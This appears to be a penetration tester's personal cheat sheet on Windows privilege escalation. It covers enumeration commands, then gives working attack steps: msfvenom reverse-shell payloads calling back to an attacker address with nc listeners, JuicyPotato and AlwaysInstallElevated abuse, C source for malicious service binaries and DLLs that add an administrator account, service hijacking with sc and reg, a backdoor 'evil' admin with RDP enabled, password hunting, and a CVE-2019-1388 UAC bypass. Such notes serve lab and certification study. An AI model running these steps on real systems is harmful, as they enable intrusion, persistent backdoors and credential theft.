Windows

This is a page dedicated to privilege escalation in windows. Helpful hacktricks checklist: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

Tools

Always double check information from automated tools manually.

Executables

winPEAS: https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

Seatbelt (compile): https://github.com/GhostPack/Seatbelt

Watson (compile): https://github.com/rasta-mouse/Watson

SharpUp (compile): https://github.com/GhostPack/SharpUp

PowerShell

Local

winPEAS: https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS windows exploit suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Informations we have to obtain

• Username and hostname

• Group memberships of the current user

• Existing users and groups

• Operating system, version and architecture

• Network information

• Installed applications

• Running processes

System information

Look for valueable information in C:\ and user home folders manually.

Get-History # get powershell command history
(Get-PSReadlineOption).HistorySavePath # get path to saved history (more data)
systeminfo #Info about the system
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
net user #List system users
wmic qfe get Caption,Description,HotFixID,InstalledOn #Check patches

Get-Process # check processes
Get-Process <PROCESS_NAME> | Format-List Path # get process path
Get-Process <PROCESS_NAME> -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30 # watch for process

Get-ChildItem Env: | ft Key,Value # check for credentials in path

Event Viewer

Powershell logs can be also found under the Windows folder

You can also search for events recorded by Script Block Logging.

Search term: 4104

Installed programs

We should always check 32-bit and 64-bit Program Files directories located in C:.

Additionally, we should review the contents of the Downloads directory of our user to find more potential programs.

# Run the commands below also without 'select displayname'
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Network enumeration

ipconfig #Information about IP addresses
ipconfig /all #More information about addresses, architecture, DNS Servers
arp -a #Address resolution
route print #Routing table
netstat -ano #Check open ports ! maybe the same internal port differ from external !

User information

whoami #Check user
whoami /priv #Check privileges
whoami /groups #Check groups
net localgroup #Users that are in the same group

net user <user> #Information about the user
net localgroup <user> #Information about users that are in the same group as input

Get-LocalUser # List system users [PowerShell]
Get-LocalGroup # List system groups [PowerShell]
Get-LocalGroupMember <GROUP> # List members of the specific group

Check drives

wmic logicaldisk get caption,description,providername #Get drives

Antivirus information

sc query windefend #Information about windwos defender
sc queryex type= service #Services that are running on the machine

Firewall information

netsh advfirewall firewall dump #Check firewall [New command] 
netsh firewall show state #Check firewall [Old command]
netsh firewall show config #Check firewall configuration

Password Hunting

More content: https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-looting-for-passwords

findstr /si password *.txt *.ini *.config #Search for phraze in files with given ext

Cmdkey listing

cmdkey /list

If any key was found you can try exploiting run as to get access

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savedcred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

Search for .txt and .ini files

Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

More interesting extensions:

*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx 

Browsers

Check cashe and search for installed addons.

Run As

If you have credentials to the another user which do not have permissions to connect through RDP and WINRM you can use the following command (you need RDP as another user):

runas /user:backupadmin cmd

Sometimes in windows you are able to run a program with run as privileges. Run As admin command :

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savedcred "command"

WSL

You can get some interesting information in linux subsystem (see Internal > Linux to enumerate).

where /R DISC:\ bash.exe #search for wsl files
where /R DISC:\ wsl.exe #search for wsl files

./ubuntun1604.exe config --default-user root #if not root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' #reverse shell creation

Token impersonation

Privileges can differ on the method of connecting to the target. e.g. ssh can have limited privileges in comparison to reverse shell

Tokens are temporary keys that allow you access to a system/network without providing the credentials. It works similar to cookies.

You have 2 types of tokensL

Delegate - created for logging into a machine using remote desktop

Impersonate - "non-interactive" such as attaching a network drive or a domain logon script

whomi /priv

Then look here to find privileges that can be used: https://github.com/gtworek/Priv2Admin

Potato Attacks

JuicyPotato.exe

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

Before executing the payload you have to create reverse shell using msfvenom:

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.16.35 lport=8787 > shell.bat

Set up listener:

nc -nlvp 8787

Payload:

JuicyPotato.exe -t * -p shell.bat -l 4444

GetCLSID List:

https://github.com/ohpe/juicy-potato/blob/master/CLSID/

GetCLSID.ps1

https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

GITHUB

https://github.com/ohpe/juicy-potato

You can have problems with executing commands after using GodPotato. In this case it is the best to add new user to administrators group and open RDP.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net user evil evil /add
net localgroup administrators evil /add

Registry

Autorun (RDP required)

In order to check for autoruns that can be used you can download the Autoruns64.exe tool.

In Autoruns, click on the ‘Logon’ tab.

From The listed results search where exploitable program has its path.

Use accesschk64.exe -wvu "C:\Program Files\Autorun Program" in order to check access permissions.

You can replace the file with msfvenom created reverse shell.

When event happens (e.g. Administrator will login you will get reverse shell)

These tools can be found here: https://github.com/davehardy20/sysinternals

AlwaysInstallElevated

You can also exploit it in the quick way using PowerUp.ps1 tool

Check if value in registry is 1

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

If the configuration is vulnerable you can proceed to exploit the system in the following way:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali Address] -f msi -o setup.msi

Place the file in C:\Temp

msiexec /quiet /qn /i C:\Temp\setup.msi

Regsvc

ACL If the group that user belongs to has full control the machine can be exploited. You can check it by running the following command:

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Exploitation:

Get windows_service.c file: https://github.com/sagishahar/scripts/blob/master/windows_service.c.

Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

Exit the text editor and compile the file by typing the following in the command prompt:

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Copy the generated file to windows machine (C:\Temp)

Open command prompt at type:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

If the technique succeded user should be added to administrator group.

net localgroup administrators

Startup

Microsoft documentation with listed permissions: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

Check permissions:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

If you have permissions to the directory create malicious file in kali:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] LPORT=4444 -f exe -o x.exe

Place it here:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Create listener in kali

nc -nlvp 4444

Wait for administrator to login.

Service Binary Hijacking

When using a network logon such as WinRM or a bind shell, Get-CimInstance and Get-Service will result in a "permission denied" error when querying for services with a non-administrative user. Using an interactive logon such as RDP solves this problem.

List the services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

wmic service get name,pathname # alternative way to list services

services # using evil-winrm

Check service with icalcs:

icacls "<SERVICE_PATH>"

Icalcs permissions:

Mask	Permissions
F	Full access
M	Modify access
RX	Read and execute access
R	Read-only access
W	Write-only access

If you have permissions you can replace the file with malicious one:

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

Compilation:

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Replacement:

move <PATH_TO_EXE> <BACKUP_ORIGINAL_EXE> # move to other folder

move <MALICIOUS_EXE_FILE> <PATH_TO_EXE> # change name from malicious one to the original used by windows

Service restart

Stop service:

service stop <SERVICE>

If service can be started.

service start <SERVICE>

Service restart alternatiie

PC restart

Check service startmode options

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<SERVICE>'}

Service DLL Hijacking

Windows's standard search order

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH 
environment variable.

Get running services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check permissions:

icacls "<SERVICE_PATH>"

Use procmon to investigate the binary:

Unfortunately procmon requires administrative access. In the real world pentest we can transfer the files to our system and use procmon locally.

Initialize service on our own host

Run all commands on our hosts from powershell / cmd run as Administrator

Move all files to same PATH as it is on the victim machine.

Create the service:

sc.exe create "<SERVICE_NAME>" binpath= "<PATH_TO_SERVICE_FILES_LIKE_ON_THE_VICTIM_MACHINE>"

Restart the service (PowerShell):

Restart-Service <SERVICE_NAME>"

Run Procmon64.exe.

Filter menu > Filter

Replace BetaServ.exe with process of your choice and click ADD.

Procmon Filter

Restart Service in powershell and analyze the response in ProcMon:

Restart-Service <SERVICE>

During the analysis look for the CreateFile attempts with states:

• NAME NOT FOUND

• PATH NOT FOUND

See the path variables:

$env:path

DLL replacement file:

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

Compile the dll:

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Put the dll.

move <MALICIOUS_DLL> <ORIGINAL_DLL_PATH>

Restart the vulnerable service:

Restart-Service <SERVICE>

Path

binPath

Check permissions write access for everyone:

accesschk64.exe -wuvc Everyone *

If something was found we can use direct accesschk64.exe command on this service in order to obtain more information (in this case daclsvc):

accesschk64.exe -wuvc daclsvc

Exploitation (change daclsvc to your found service):

sc config daclsvc binpath= "net localgroup administrators user /add"

if you can change configuration:

sc config daclsvc binpath= "net localgroup administrators user /add"

sc stop daclsvc & sc start daclsvc

Unquoted service path

We can use this attack when we have Write permissions to a service's main directory or subdirectories but cannot replace files within them.

PowerUp.ps1 > Invoke-AllChecks > Checking for unquoted service path

Open powershell in execution policy bypass in order to execute scripts:

powershell -ep bypass

Execute PowerUp.ps1:

. .\PowerUp.ps1

Run function from powerup:

Get-UnquotedService

Is vulnerable when:

• Not enclosed in quotation marks

• Has spaces inside

How windows search for it? When we have the following path:

C:\Program Files\Unquoted Path Service\unquotedpath.exe

1. C:\Program.exe -> not found

2. C:\Program Files\Unqoted.exe -> not found

3. C:\Program Files\Unquoted Path.exe -> not found

4. ... until he finds the exe

We can exploit this by creating malicious file in the following path with the following name:

C:\Program.exe
or
C:\Program Files\Unqoted.exe
or
C:\Program Files\Unquoted Path.exe

You can use msfvenom in order to create the file (we use unqouted.exe as example).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] LPORT=4444 -f exe -o unqoted.exe

Move the generated file to windows.

Set up listener

nc -nlvp 4444

In order to execute the file start the service

sc start servicename

Unquoted service path (manual)

If binary contains spaces, unquoted path and we have write access to directories in this path we are able to execute the attack.

Enumerate running and stopped services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

More efficient way:

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

After finding the vulnerable path test if we can reset the service (or reboot machine which will start it).

Start-Service <SERVICE>

Stop-Service <SERVICE>

Check access to paths using icacls:

icacls "C:\"

Scheduled tasks

Task has to be run as Administrative user or NT AUTHORITY\SYSTEM.

Also the executable has to be modyfiable to us.

Check scheduled tasks:

schtasks /query /fo LIST /v

Get-ScheduledTask

Check permissions:

icacls <PATH>

CVE-2019-1388

RDP access required

Find a program that can trigger the UAC prompt screen

Select "Show more details"

Select "Show information about the publisher's certificate"

Click on the "Issued by" URL link it will prompt a browser interface.

Wait for the site to be fully loaded & select "save as" to prompt a explorer window for "save as".

On the explorer window address path, enter the cmd.exe full path: C:\WINDOWS\system32\cmd.exe

Now you'll have an escalated privileges command prompt.